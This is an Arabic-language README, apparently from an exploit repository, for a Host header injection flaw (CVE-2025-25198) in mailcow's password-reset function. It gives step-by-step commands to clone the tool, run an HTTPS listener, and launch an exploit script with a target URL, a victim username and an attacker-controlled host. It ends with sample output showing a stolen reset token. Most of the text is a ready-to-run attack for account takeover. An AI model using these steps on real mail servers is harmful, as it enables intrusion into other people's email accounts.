
يلتقط رموز إعادة تعيين كلمة المرور من هجمات حقن رأس المضيف في Mailcow.
mailcow: dockerized هي مجموعة برامج جماعية/بريد إلكتروني مفتوحة المصدر مبنية على docker. قبل الإصدار 2025-01a، تسمح ثغرة أمنية في وظيفة إعادة تعيين كلمة المرور في mailcow للمهاجم بالتلاعب في Host HTTP header لتوليد رابط إعادة تعيين كلمة مرور يشير إلى نطاق يتحكم فيه المهاجم. يمكن أن يؤدي هذا إلى الاستيلاء على الحساب إذا نقر المستخدم على الرابط المسموم.
تقوم بإعداد خادم https لاستقبال جميع الطلبات وترسل طلب POST إلى الموقع مع ترويسة Host مع <IP> الذي اخترته. يمكنك أيضًا استخدام Burpsuite لإرسال الطلب والحصول على الرمز المميز (Token) في الخادم.
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <[email protected]> --host <ip>:<port> <--insecure | optional >
بعد الانتظار قليلاً، سيخرج الخادم الرمز المميز الذي يمكنك استخدامه:
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245